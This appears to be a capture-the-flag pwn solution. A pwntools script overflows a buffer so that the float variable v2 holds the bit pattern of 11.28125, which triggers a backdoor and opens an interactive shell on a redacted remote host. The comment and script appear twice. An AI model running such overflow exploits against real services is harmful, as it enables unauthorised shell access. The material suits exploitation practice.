溢出覆盖掉v2为11.28125的存储形式从而打开后门.
from pwn import *
p=remote('xxxxxxxxxx',xxxxx)
payload='I'*(0x30-0x04)+p32(0b01000001001101001000000000000000)
p.recvuntil('Let\'s guess the number.')
p.sendline(payload)
p.interactive()
溢出覆盖掉v2为11.28125的存储形式从而打开后门.
from pwn import *
p=remote('xxxxxxxxxx',xxxxx)
payload='I'*(0x30-0x04)+p32(0b01000001001101001000000000000000)
p.recvuntil('Let\'s guess the number.')
p.sendline(payload)
p.interactive()